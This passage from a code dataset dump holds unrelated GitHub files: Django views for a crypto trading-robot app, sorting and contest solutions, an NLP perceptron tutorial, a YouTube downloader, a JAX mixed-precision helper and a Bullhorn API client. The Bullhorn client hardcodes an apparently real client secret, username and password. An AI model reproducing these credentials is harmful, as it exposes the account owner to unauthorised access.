(float(info[currency.upper()].get('total')) - float(property_obj.original_assets))\n * float(info1.get('last'))) + ' ' + market,\n }\n\n # print(context)\n # print('/-' * 30, len(sell), len(buy))\n return 
restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowConfigInfo(generics.CreateAPIView):\n \"\"\"\n 展示机器人配置信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n id = data_dict.get('robot_id')\n if id:\n robot_obj = Robot.objects.get(id=id)\n account_obj = Account.objects.filter(id=robot_obj.trading_account.id).first()\n # data = serialize(\"json\", Robot.objects.filter(id=id))\n account = Robot.objects.get(id=id)\n serialize = RobotSerializer(account)\n user_obj, service_obj, market_obj = get_account_info(robot_obj.currency, robot_obj.market,\n robot_obj.trading_account.id)\n robot_warning = Robot.objects.get(id=id)\n # accounts = UserInfo.objects.filter(id__in=robot_warning.warning_account[1:-1].split(\",\"))\n accounts = robot_warning.warning_account\n try:\n info = service_obj.get_balance()\n info = info.get('funds')\n except:\n return restful.params_error(message='币种错误,请核对!')\n # print(json.loads(data)['pk'], type(json.loads(data)))\n context = {\n # 交易币种可用\n 'currency': self.data_format(info[robot_obj.currency.upper()].get('balance')) + ' ' + robot_obj.currency,\n # 交易市场可用\n 'market': self.data_format(info[robot_obj.market.upper()].get('balance')) + ' ' + robot_obj.market,\n # 账户信息\n 'account_name': str(account_obj.title),\n # 机器人信息\n 'robot': serialize.data,\n # 已勾选的预警用户\n 'warning_account': accounts\n }\n print(context)\n return restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowConfig(generics.CreateAPIView):\n \"\"\"\n 修改机器人配置信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n print('-----------------')\n try:\n data = request.body.decode(\"utf-8\")\n print(data)\n data_dict = json.loads(data)\n # 获取机器人id\n id = data_dict.get('robot_id')\n # 获取挂单频率\n orders_frequency = data_dict.get('orders_frequency')\n # 获取挂单最小数量\n min_num = data_dict.get('min_num')\n # 获取挂单最大数量\n max_num = data_dict.get('max_num')\n # 获取止损价\n stop_price = data_dict.get('stop_price')\n # 获取预警价\n warning_price = data_dict.get('warning_price')\n except:\n import traceback\n traceback.print_exc()\n Robot.objects.filter(id=id).update(\n orders_frequency=orders_frequency,\n min_num=min_num,\n max_num=max_num,\n stop_price=stop_price,\n warning_price=warning_price,\n )\n return restful.ok()\n\n\nclass WarningUsers(generics.CreateAPIView):\n \"\"\"\n 序列化预警账户\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n try:\n users = UserInfo.objects.filter(status=1)\n usr = UserSerializer(users, many=True)\n except Exception as e:\n import traceback\n traceback.print_exc()\n print(e)\n return restful.result(data=usr.data)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass RobotList(generics.CreateAPIView):\n \"\"\"\n 机器人管理列表页面\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n pageNum = int(data_dict.get('pageIndex', 1))\n pagesize = data_dict.get('pageSize')\n if pageNum is None:\n return restful.params_error(message='参数为空')\n\n robots = Robot.objects.all()\n try:\n paginator = Paginator(robots, 2)\n page_obj = paginator.page(pageNum)\n except:\n return restful.params_error(message='页码错误')\n numPerPage = 
len(page_obj.object_list)\n totalCount = robots.count()\n totalPageNum = paginator.num_pages\n\n context = {\n 'numPerPage': numPerPage,\n 'PageNum': pageNum,\n 'result': RobotSerializer(page_obj.object_list, many=True).data,\n 'totalCount': totalCount,\n 'totalPageNum': totalPageNum,\n 'account': RobotSerializer(robots, fields=('account_id', 'account_title'), many=True).data\n }\n\n return restful.result(data=context)\n\n\nclass RobotYield(generics.CreateAPIView):\n \"\"\"\n 机器人收益计算更新到数据库\n \"\"\"\n serializer_class = AccountSerializer\n robot_yield = {}\n\n # 用作对数据做精度处理\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n # 获取用户id\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n accounts = Account.objects.filter(users=user_id)\n print(accounts)\n for account in accounts:\n exx_service = ExxService(account.secretkey, account.accesskey)\n robots = Robot.objects.filter(trading_account_id=account.id)\n for robot in robots:\n robot_id = robot.id # 机器人id\n print(\"机器人id:\"+str(robot_id))\n currency = robot.currency # 交易币种\n market = robot.market # 市场币种\n total_money = re.findall('\\d+\\.\\d\\d',robot.total_money)[0] # 总投入\n print(\"总投入\", total_money)\n last_price = robot.current_price # 当时价格\n start_time = float(robot.running_time) # 创建时间\n try:\n print(\"交易币种:\"+currency,\"市场币种:\"+market,\"账户id:\"+ str(account.id))\n user_obj, service_obj, market_obj = get_account_info(currency, market, account.id)\n info = exx_service.get_balance()\n info = info.get('funds')\n info1 = market_obj.get_ticker()\n info1 = info1.get('ticker')\n current_price = info1.get('last') # 最新价格\n balance_currency = self.data_format(info[currency.upper()].get('total')) #可用的交易币种数量\n balance_market = self.data_format(info[market.upper()].get('total')) #冻结的市场币种\n current_time = time.time() #获取最新的时间\n\n run_time = (int(current_time) - int(start_time))/1000*60 #运行多少分钟\n print(balance_market,balance_currency)\n residue_num = ((float(balance_currency) ) / float(last_price) ) + (float(balance_market) )\n float_profit = residue_num * float(current_price) - float(total_money) * float(last_price) #浮动盈亏(折算为交易市场币种):当前剩余币种数量*当前价格-总投入数量*当时价格\n realized_profit = residue_num - float(total_money) #实现利润(折算为交易市场币种):当前剩余币种数量-总投入数量\n total_profit = float_profit + realized_profit #总利润(折算为交易市场币种):浮动盈亏+实现利润\n annual_yield = realized_profit / float(total_money) / (run_time * 525600 * 1 ) #年化收益率:实现利润/总投入/运行分钟数*525,600*100%\n Robot.objects.filter(id=robot_id).update(float_profit=self.data_format(float_profit),\n realized_profit=self.data_format(realized_profit),\n total_profit=self.data_format(total_profit),\n annual_yield=self.data_format(annual_yield))\n robot_obj = Robot.objects.get(id=robot_id)\n serialize = RobotSerializer(robot_obj) #序列化机器人数据返回客户端\n print(serialize.data)\n context = {\n 'id': robot_id,\n 'float_profit': self.data_format(float_profit) + market,\n 'realized_profit': self.data_format(realized_profit) + market,\n 'total_profit': self.data_format(total_profit) + market,\n 'annual_yield': self.data_format(annual_yield) + '%'\n }\n self.robot_yield.update(context)\n except robot.DoesNotExist:\n robot_obj = None\n return restful.result(data=serialize.data)\n\n\n# # 分页\n# def get_pagination_data(paginator, page_obj, around_count=2):\n# current_page = page_obj.number\n# num_pages = paginator.num_pages\n#\n# left_has_more = False\n# 
right_has_more = False\n#\n# if current_page <= around_count + 2:\n# left_pages = range(1, current_page)\n# else:\n# left_has_more = True\n# left_pages = range(current_page - around_count, current_page)\n#\n# if current_page >= num_pages - around_count - 1:\n# right_pages = range(current_page + 1, num_pages + 1)\n# else:\n# right_has_more = True\n# right_pages = range(current_page + 1, current_page + around_count + 1)\n#\n#\n#\n# return {\n# # left_pages:代表的是当前这页的左边的页的页码\n# 'left_pages': left_pages,\n# # right_pages:代表的是当前这页的右边的页的页码\n# 'right_pages': right_pages,\n# 'current_page': current_page,\n# 'left_has_more': left_has_more,\n# 'right_has_more': right_has_more,\n# 'num_pages': num_pages\n# }\n","repo_name":"qileDai/quantization_deal","sub_path":"apps/deal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":40063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74684239786","text":"#ASHITA GOYAL (11) SEC - A1\r\n\r\ndef countingSort(arr, exp1): \r\n \r\n n = len(arr) \r\n \r\n output = [0] * (n) \r\n \r\n count = [0] * (10) \r\n \r\n for i in range(0, n): \r\n index = (arr[i]/exp1) \r\n count[int((index)%10)] += 1\r\n \r\n for i in range(1,10): \r\n count[i] += count[i-1] \r\n \r\n i = n-1\r\n while i>=0: \r\n index = (arr[i]/exp1) \r\n output[ count[ int((index)%10) ] - 1] = arr[i] \r\n count[int((index)%10)] -= 1\r\n i -= 1\r\n \r\n i = 0\r\n for i in range(0,len(arr)): \r\n arr[i] = output[i] \r\n \r\ndef radixSort(arr):\r\n \r\n max1 = max(arr)\r\n \r\n exp = 1\r\n while max1/exp > 0:\r\n countingSort(arr,exp)\r\n exp *= 10\r\n\r\nl = list(map(int, input(\"ENTER THE LIST TO BE SORTED: \").split()))\r\nradixSort(l)\r\nprint(\"SORTED LIST: \", l)\r\n\r\n#Time - Complexity : O((n+b) * logb(k)), where b is the base for representing numbers, d is the digits in input integers, k is the maximum possible value, n is the number of inputs.\r\n","repo_name":"ashita1910/DAA_Assignments","sub_path":"Radix Sort.py","file_name":"Radix Sort.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26613413603","text":"n = int(input())\nA = [list(input()) for _ in range(n)]\n\ndx = [0, 0, 1, -1, 1, 1, -1, -1]\ndy = [1, -1, 0, 0, 1, -1, 1, -1]\n\n\ndef check(sx, sy, nx, ny):\n ans = [A[sy][sx]]\n cnt = int(A[sy][sx])\n for _ in range(n - 1):\n sx, sy = sx + nx, sy + ny\n if sx < 0:\n sx = n - 1\n if sy < 0:\n sy = n - 1\n if sx >= n:\n sx = 0\n if sy >= n:\n sy = 0\n ans.append(A[sy][sx])\n cnt += int(A[sy][sx])\n\n return ans, cnt\n\n\nma = -1\nret = []\nfor sx in range(n):\n for sy in range(n):\n for i in range(8):\n nx, ny = dx[i], dy[i]\n ans, cnt = check(sx, sy, nx, ny)\n\n ret.append(ans)\n\nrets = [\"\".join(t) for t in ret]\nrets = sorted(rets, reverse=True)\n# print(rets)\nprint(rets[0])\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-258/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278562349","text":"from pypath.inputs.disgenet._field import (\n DiseaseClasses,\n Float,\n Int,\n ProteinClass,\n Str,\n Tuple,\n)\n\n\nSCHEMA = {\n 'entrez': (Str, 'geneid'),\n 'genesymbol': (Str, 'gene_symbol'),\n 'uniprot': (Str, 'uniprotid'),\n 'dsi': (Float, '{entity_type}_dsi'),\n 'dpi': (Float, '{entity_type}_dpi'),\n 'pli': (Float, 'gene_pli'),\n 'protein_class': (ProteinClass, 
('protein_class', 'protein_class_name')),\n 'classes': (DiseaseClasses, ('disease{i}_class', 'disease{i}_class_name')),\n 'jaccard_genes': Float,\n 'jaccard_variants': Float,\n 'pvalue_jaccard_genes': Float,\n 'pvalue_jaccard_variants': Float,\n 'type': (Str, 'disease_type'),\n 'id': (Str, '{entity_type}id{i}'),\n 'name': (Str, 'disease{i}_name'),\n 'semantic_type': (Str, 'disease_semantic_type'),\n 'ngenes': (Int, 'disease{i}_ngenes'),\n 'nvariants': (Int, 'disease{i}_nvariants'),\n 'consequence_type': (Str, 'variant_consequence_type'),\n 'score': Float,\n 'ei': Float,\n 'el': Str,\n 'year_initial': Int,\n 'year_final': Int,\n 'source': Str,\n}\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/disgenet/_schema.py","file_name":"_schema.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"30033350547","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport random\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3],[1,1,1])\n # return np.dot(rgb[...,:3],[0.3,0.59,0.11]) \nimg_rgb = mpimg.imread('C:\\\\Users\\\\gupta\\\\Downloads\\\\book.jpeg')\n\n\nimg_grayo = rgb2gray(img_rgb)\n\nfor i in range(img_grayo.shape[0]):\n for k in range(img_grayo.shape[1]):\n if (i==200 and k>=300 and k<=500) or (k==400 and i>=200 and i<=400) :\n img_grayo[i,k]=1\n else:\n img_grayo[i,k]=0\nplt.imshow(img_grayo, cmap=plt.get_cmap('binary_r')) \nplt.show()","repo_name":"Sanky2104/VS-Code","sub_path":"python/t_dda.py","file_name":"t_dda.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11822653199","text":"import requests\nimport json\n\nfrom dpi.bullhorn.config import BullhornConfig\n\ndef get_bhrest_token():\n ## Required details to get Authentication code, Access code and BhRestToken\n client_id = \"5166a72d-6ddc-454c-aa35-b287d085be8a\"\n client_secret = \"QLcu3T9vSSB0QXsdkH6KIrfn\"\n username = \"dialpad.api\"\n password = \"T32F3kv$P!S][TQ1\"\n response_type = \"code\"\n action = \"Login\"\n state = \"\"\n grant_type = \"authorization_code\"\n redirect_uri = \"\"\n version = \"*\"\n\n ## Bullhorn Authentication base-urls\n get_auth_code_url = \"https://auth.bullhornstaffing.com/oauth/authorize\"\n get_access_token_url = \"https://auth.bullhornstaffing.com/oauth/token\"\n get_bhrest_token_url = \"https://rest.bullhornstaffing.com/rest-services/login\"\n\n ## Request to get Authentication code\n get_auth_code_url += \"?client_id={}&password={}&username={}&action={}&response_type={}\".format(client_id, password, username, action, response_type)\n auth_code_resp = requests.get(url=get_auth_code_url, allow_redirects=False)\n location = auth_code_resp.headers['Location']\n print(\"Auth code resp : {}\".format(location))\n from urllib.parse import urlparse\n parsed_url = urlparse(location)\n print(\"Parsed URL : {}\".format(parsed_url))\n print(\"Code : {}\".format(parsed_url.query[5:]))\n code = parsed_url.query[5:]\n\n ## Request to get Access Token\n get_access_token_url += \"?client_id={}&client_secret={}&grant_type={}&code={}\".format(client_id, client_secret, grant_type, code)\n access_token_resp = requests.post(url=get_access_token_url)\n json_resp = json.loads(access_token_resp.text)\n print(\"Access Token resp : {}\".format(json_resp))\n access_token = json_resp['access_token']\n\n ## Request to get BhRestToken\n get_bhrest_token_url += 
\"?version={}&access_token={}\".format(version, access_token)\n bhrest_token_resp = requests.post(url=get_bhrest_token_url)\n parsed_resp = json.loads(bhrest_token_resp.text) \n print(\"BhRestToken resp : {}\".format(parsed_resp))\n bhrest_token = parsed_resp.get('BhRestToken')\n return bhrest_token\n\n\n\nclass BullhornAction():\n\n def __init__(self, request, access_token=None, bhrest_token=None):\n self.request = request\n self.access_token = access_token\n self.bhrest_token = bhrest_token\n self.bh_config = BullhornConfig()\n\n def build_free_search_query(self, entity_type, search_val):\n print(\"\\n---------------------- In build_free_search_query() ---------------------\\n\")\n query = \"\"\n search_val = search_val.strip()\n for i, field in enumerate(self.bh_config.entity_types.get(entity_type).get('search_query_fields')):\n if i == 0:\n query += \"{}:{}*\".format(field, search_val)\n else: \n query += \" OR {}:{}*\".format(field, search_val)\n print(\"QUERY = {}\".format(query))\n return query\n\n def build_auto_search_query(self, params):\n print(\"\\n----------------------In build_auto_search_query(params = {}) ---------------------\\n\".format(params))\n \n query = \"\"\n i = 0\n for key, val in params.items():\n if i == 0:\n query += \"{}:{}\".format(key, val[0])\n else: \n query += \" AND {}:{}\".format(key, val[0])\n i +=1\n print(\"AUTO SEARCH QUERY -- = {}\".format(query))\n return query\n \n def make_request(self, url, method, body=dict()):\n print(\"\\n---------------------- In make_request(url={}, method={}, body={}) ---------------------\\n\".format(url, method, body))\n request_resp = None\n resp = {}\n if method == \"GET\":\n request_resp = requests.get(url)\n elif method == \"POST\":\n request_resp = requests.post(url, data=body)\n elif method == \"PUT\":\n request_resp = requests.put(url, data=body)\n elif method == \"PATCH\":\n request_resp = requests.patch(url, data=body)\n \n if request_resp.status_code == 200:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 200\n elif request_resp.status_code == 400:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 400\n elif request_resp.status_code == 401:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 401\n elif request_resp.status_code == 403:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 403\n else:\n resp.update(json.loads(request_resp.text))\n resp['status'] = 500\n return resp\n \n def search_contact(self):\n print(\"\\n----------------------In search_contact() ---------------------\\n\")\n search = self.request.args.get(\"search\", False)\n query = \"\"\n \n entity_types = [key for key,val in self.bh_config.entity_types.items()]\n final_response = {\n 'data' : list(),\n 'count' : 0,\n 'status': None\n }\n for entity_type in entity_types:\n if not self.bh_config.entity_types.get(entity_type).get('is_contact_entity'):\n continue\n print(\"\\n***************************** Start Searching for {}s ***************************** \".format(entity_type.capitalize()))\n if search:\n query = self.build_free_search_query(entity_type, search)\n else:\n params = self.request.args\n if params.get('bhrest_token'):\n del params['bhrest_token']\n if params.get('access_token'):\n del params['access_token']\n query = self.build_auto_search_query(params)\n \n fields = ','.join(self.bh_config.entity_types.get(entity_type).get('response_fields'))\n url = self.bh_config.rest_base_url+self.bh_config.get_entity_url+\"?query={}&fields={}\"\n url = 
url.format(self.bh_config.entity_types.get(entity_type).get('name'), query, fields)\n url = url+\"&BhRestToken={}\".format(self.bhrest_token)\n print(\"\\nURL : {}\".format(url))\n resp = self.make_request(url, \"GET\")\n\n print(\"REQUEST RESPONSE : {}\".format(resp))\n\n if resp.get('status') == 200:\n final_response['status'] = 200 \n if resp.get('count') > 0:\n data = resp.get('data')\n for rec in data:\n rec['entity_type'] = entity_type\n final_response['data'].extend(data)\n final_response['count'] = final_response['count'] + resp.get('count')\n elif resp.get('status') == 401 or resp.get('status') == 403:\n final_response = resp\n break\n else:\n final_response = resp\n print(\"******************************** End Search for {}'s ******************************\\n\".format(entity_type.capitalize()))\n print(\"\\nTotal Response : {}\\n\".format(final_response))\n return final_response\n\n\n def create_contact(self):\n pass\n\n def create_note(self):\n pass\n\n def get_notes(self):\n pass\n\n def create_task(self):\n pass\n \n def get_tasks(self):\n pass\n\n ","repo_name":"chandra-sekar-1983/bullhorn_repo_final","sub_path":"server/dpi/bullhorn/api/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6353148831","text":"from collections import *\n\ndef load_model(model_file):\n\n return 0\n\n#素性を色々試す\ndef create_features(x):\n phi = defaultdict(int)\n words = x.split(' ')\n\n l = len(words)\n if l < 15:\n phi[f'LEN:{l}'] += 1\n \n for i in range(len(words)-1):\n lis = words[i:i+2]\n phi['BI:' + ' '.join(lis)] += 1\n \n #for word in words:\n # phi[\"UNI:\" + word] += 1\n \n for word in words:\n phi[\"UNI:\" + word] += 1\n #if word == word.upper():\n # phi['UPPER:' + word] += 1\n if word == word.lower():\n phi['LOWER:' + word] += 1\n return phi\n\ndef predict_one(weight, phi):\n score = 0\n for name, value in phi.items():\n if name in weight: score += value * weight[name]\n\n if score >= 0:\n return 1\n return -1\n\ndef predict_all(w, input_file, out_file):\n with open(input_file) as f, open(out_file, 'w') as out:\n for line in f:\n phi = create_features(line)\n y_pred = predict_one(w, phi)\n out.write(f'{y_pred}\\t{line}')\n\n\n\ndef online_learning(iteration_number, data):\n weights = defaultdict(int)\n\n for _ in range(iteration_number):\n with open(data) as f:\n for line in f:\n #print(line.strip().split('\\t'))\n y, x = line.strip().split('\\t')\n y = int(y)\n phi = create_features(x)\n pred_y = predict_one(weights, phi)\n\n if pred_y != y:\n update_weights(weights, phi, y)\n return weights\n\ndef update_weights(weight, phi, y):\n for name, value in phi.items():\n weight[name] += float(value * y)\n\n\n\ndef confirm_diff(answer, my_answer, positive_mispredicted_file, negative_mispredicted_file):\n\n p_cnt = 0\n n_cnt = 0\n n_words = defaultdict(lambda: 0)\n p_words = defaultdict(lambda: 0)\n\n with open(answer) as labels, open(my_answer) as preds:\n with open(positive_mispredicted_file, 'w') as p_mispred, open(negative_mispredicted_file, 'w') as n_mispred:\n for i, (label, pred) in enumerate(zip(labels, preds)):\n now = label.strip().split('\\t')\n y = int(now[0])\n sentence = now[1].split(' ')\n y = int(y)\n pred_y = int(pred.strip().split('\\t')[0])\n if pred_y != y:\n if pred_y == 1:\n n_cnt += 1\n for word in sentence:\n n_words[word] += 1\n n_mispred.write(f'Number:{i+1} {label}')\n else:\n p_cnt += 1\n for word in sentence:\n p_words[word] += 1\n 
p_mispred.write(f'Number:{i+1} {label}')\n total = p_cnt + n_cnt\n print(f'{p_cnt} + {n_cnt} = {total}')\n n_words = sorted(n_words.items(), key=lambda x: x[1])\n p_words = sorted(p_words.items(), key=lambda x: x[1])\n n_words.reverse()\n p_words.reverse()\n p_mispred.write(f'total mispred:{p_cnt}\\n')\n n_mispred.write(f'total mispred:{n_cnt}\\n')\n '''\n for k, v in n_words:\n n_mispred.write(f'{k} : {v}\\n')\n for k, v in p_words:\n p_mispred.write(f'{k} : {v}\\n')\n '''\n\n\n\n\n\nif __name__ == '__main__':\n path = '/Users/michitaka/lab/NLP_tutorial/nlptutorial/'\n\n #テスト\n input = path + 'test/03-train-input.txt'\n answer = path + 'test/03-train-answer.txt'\n #w = online_learning(5, input)\n #print(w)\n #with open('my_weights.txt','w') as f:\n # for name, value in sorted(w.items()):\n # f.write(f'{name}\\t{value}\\n')\n \n #演習\n data = path + 'data/titles-en-train.labeled'\n input = path + 'data/titles-en-test.word'\n answer = path + 'data/titles-en-test.labeled'\n iter_num = 10\n weights = online_learning(iter_num, data)\n predict_all(weights, input, 'my_answer.labeled')\n pred = '/Users/michitaka/lab/NLP_tutorial/tutorial05/my_answer.labeled'\n confirm_diff(answer, pred, 'p_mispred.labeled', 'n_mispred.labeled')\n\n#uni\n'''\nAccuracy = 92.702798%\n'''\n#+bi\n'''\nAccuracy = 93.198725%\n'''\n#+reversed bi\n'''\nAccuracy = 93.907191%\n'''\n#len\n'''\nAccuracy = 94.048884%\n'''\n#bi + len + upper,lower\n'''\nAccuracy = 94.226001%\n'''\n#uni + bi + len + lower\n'''\nAccuracy = 94.367694%\n'''\n#uni + bi + len + lower (len < 15)\n'''\nAccuracy = 94.721927%\n'''","repo_name":"lmichitakal/lab","sub_path":"NLP_tutorial/tutorial05/tutorial05.py","file_name":"tutorial05.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22968315809","text":"# Melyik szám a nagyobb?\r\n\r\nszam1 = int(input(\"Kérlek add meg az első számot: \"))\r\nszam2 = int(input(\"Kérlek add meg a második számot: \"))\r\nszam3 = int(input(\"Kérlek add meg a harmadik számot: \"))\r\n\r\nif szam1 > szam2 and szam1 > szam3:\r\n print(\"Az első szám a nagyobb\")\r\nelif szam2 > szam1 and szam2 > szam3:\r\n print(\"A második szám a nagyobb\")\r\nelif szam3 > szam2 and szam3 > szam1:\r\n print(\"A harmadik szám a nagyobb\")\r\nelif szam1 == szam2 == szam3:\r\n print(\"Mindhárom szám egyenlő!\")","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python Projects/Practice3/melyik-szam-a-nagyobb-3-szammal.py","file_name":"melyik-szam-a-nagyobb-3-szammal.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70278562349","text":"\ndef printGrid(Grid):\n row = len(Grid)\n col = len(Grid[0])\n\n for x in range(row):\n for y in range(col):\n print(Grid[x][y],end = '')\n print(\"\")\n\n\n\ndef sumCell(Grid,x,y):\n row = len(Grid)\n col = len(Grid[0])\n\n sum = 0\n\n for a in range(x-1,x+2):\n for b in range(y-1,y+2):\n if a<0 or a>=row or b < 0 or b >= col:\n continue\n elif a == x and b == y:\n continue\n else:\n sum = sum + Grid[a][b]\n \n return sum\n\ndef Generate(Grid):\n row = len(Grid)\n col = len(Grid[0])\n temp = [[0 for i in range(col)] for j in range (row)]\n\n for x in range(row):\n for y in range(col):\n sum = sumCell(Grid,x,y)\n \n #when itself is alive\n if Grid[x][y] == 1:\n # case when it dies\n if sum <= 1 or sum >= 4:\n temp[x][y] = 0\n else:\n temp[x][y] = 1\n #when itself is dead\n else:\n if sum == 3:\n 
temp[x][y] = 1\n else:\n temp[x][y] = 0\n \n return temp\n\n\n\n\nprint(\"first\")\nFirst = [[1,1,1,1,1,1],[1,1,1,1,1,1],[1,1,1,1,1,1],[1,1,1,1,1,1]]\nprintGrid(First)\nprint(\"second\")\nsecond = Generate(First)\nprintGrid(second)\n\n\n\n","repo_name":"YizhenS/Game-of-life-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34831785924","text":"from pytube import YouTube\n\ndef Download(link):\n youtubeObject = YouTube(link)\n youtubeObject = youtubeObject.streams.get_by_resolution(\"720p\")\n\n try:\n youtubeObject.download(\"Downloads\")\n except:\n print(\"There has been an error in downloading\")\n print(\"This download has completed!\")\n\nlink = input(\"Put your youtube link here! URL: \")\nDownload(link)","repo_name":"randhana/Python-YT-Downloader","sub_path":"YouTube_Downloader.py","file_name":"YouTube_Downloader.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73563716906","text":"#!python3\nimport fnmatch\nimport os\nimport sys\n\nsources = [\n {'dir': 'Code', 'exclude_masks': ['Tools/*', 'Sandbox/Editor/*', 'Libs/*', 'Game_Hunt/*', 'Game03/*', 'SDKs/*']},\n]\n\n\ndef matches_any_of(filename, masks):\n \"\"\"\n :param filename: Filename to check.\n :param masks: List of masks against which to check the filename.\n :return: True if filename matches any of the masks.\n \"\"\"\n name = filename.lower().replace('\\\\', '/')\n for mask in masks:\n mask = mask.lower().replace('\\\\', '/')\n if fnmatch.fnmatch(name, mask):\n print(\"{} matches {}\".format(name, mask))\n return True\n return False\n\n\ndef process_folder(out_files, folder, exclude_masks):\n \"\"\"\n Walk the specified directory, running cppcheck against all .cpp and .c files in it,\n unless the file path matches any of the exclude_masks, in which case, skip it.\n :param out_files: [out] List of files in the specified folder that CppCheck should process.\n :param folder: Folder to parse.\n :param exclude_masks: List of filename masks to skip.\n :return: None.\n \"\"\"\n for dirpath, dirnames, filenames in os.walk(folder):\n # If a directory matches an exclude path, so will all the files it contains.\n if matches_any_of(dirpath, exclude_masks):\n continue\n\n for filename in filenames:\n filepath = os.path.join(dirpath, filename)\n\n # Force lower case just in case somebody has named their file strangely (for instance, \"file.C\")\n if os.path.splitext(filename.lower())[1] not in ['.cpp', '.cxx', '.c']:\n continue\n\n # If the file path matches any of the exclude masks, we are deliberately ignoring it.\n if matches_any_of(filepath, exclude_masks):\n continue\n out_files.append(filepath)\n\n\ndef main(argv):\n if len(argv) != 3:\n print(\"Usage: python3 prepare_filelist_for_cppcheck.py base_folder output_list_filename\")\n return 1\n\n base_folder = os.path.abspath(argv[1])\n\n files = []\n\n for src in sources:\n src['exclude_masks'] = [os.path.join(base_folder, src['dir'], x) for x in src['exclude_masks']]\n process_folder(files, os.path.join(base_folder, src['dir']), src['exclude_masks'])\n\n with open(argv[2], 'w') as file:\n for f in files:\n f = os.path.abspath(f)\n f = os.path.relpath(f, base_folder)\n file.write(f.replace('\\\\', '/') + '\\n')\n\n return 0\n\n\nif __name__ == \"__main__\":\n res = main(sys.argv)\n 
sys.exit(res)\n","repo_name":"HanetakaChou/CryEngine-5.2.3","sub_path":"Code/Tools/cppcheck/prepare_filelist_for_cppcheck.py","file_name":"prepare_filelist_for_cppcheck.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"32464655873","text":"from brachy import structure_util as su\nfrom jax.tree_util import tree_map, Partial\nfrom jax import numpy as jnp\nfrom jax import custom_vjp\nfrom jax import custom_jvp\n\n\nimport jax\n\n\n\ndef _cast_fp16(x):\n if jnp.array(x).dtype==jnp.float32:\n return jnp.array(x).astype(jnp.float16)\n else:\n return x\n\ndef _cast_fp32(x):\n if jnp.array(x).dtype==jnp.float16:\n return jnp.array(x).astype(jnp.float32)\n else:\n return x\n\ndef fp16_apply(apply):\n def new_apply(tree, global_config, *args, **kwargs):\n params_dtypes = tree_map(lambda x: jnp.array(x).dtype, tree['params'])\n buffers_dtypes = tree_map(lambda x: jnp.array(x).dtype, tree['buffers'])\n tree['params'] = tree_map(_cast_fp16, tree['params'])\n tree['buffers'] = tree_map(_cast_fp16, tree['buffers'])\n args = [tree_map(_cast_fp16, arg) for arg in args]\n kwargs = {k: tree_map(_cast_fp16, v) for k, v in kwargs.items()}\n \n state, value = apply(tree, global_config, *args, **kwargs)\n\n state['params'] = tree_map(lambda x, t: jnp.array(x).astype(t), state['params'], params_dtypes)\n state['buffers'] = tree_map(lambda x, t: jnp.array(x).astype(t), state['buffers'], buffers_dtypes)\n \n value = tree_map(_cast_fp32, value)\n\n return state, value\n return new_apply\n\ndef high_precision_apply(apply):\n def new_apply(tree, global_config, *args, **kwargs):\n args = tree_map(_cast_fp32, args)\n kwargs = tree_map(_cast_fp32, kwargs)\n \n state, value = apply(tree, global_config, *args, **kwargs)\n \n value = tree_map(_cast_fp32, value)\n\n return state, value\n return new_apply\n \n\ndef cast_node(node, path):\n node = su.copy_to_leaf(node)\n node['aux']['mixed_precision'] = {\n 'old_apply': node['apply']\n }\n if 'force_high_precision' in node['aux'] and node['aux']['force_high_precision']:\n node['apply'] = high_precision_apply(node['apply'])\n return node\n\n node['apply'] = fp16_apply(node['apply'])\n\n return node\n\ndef cast_tree_f16(tree):\n mixed_precision_buffers = 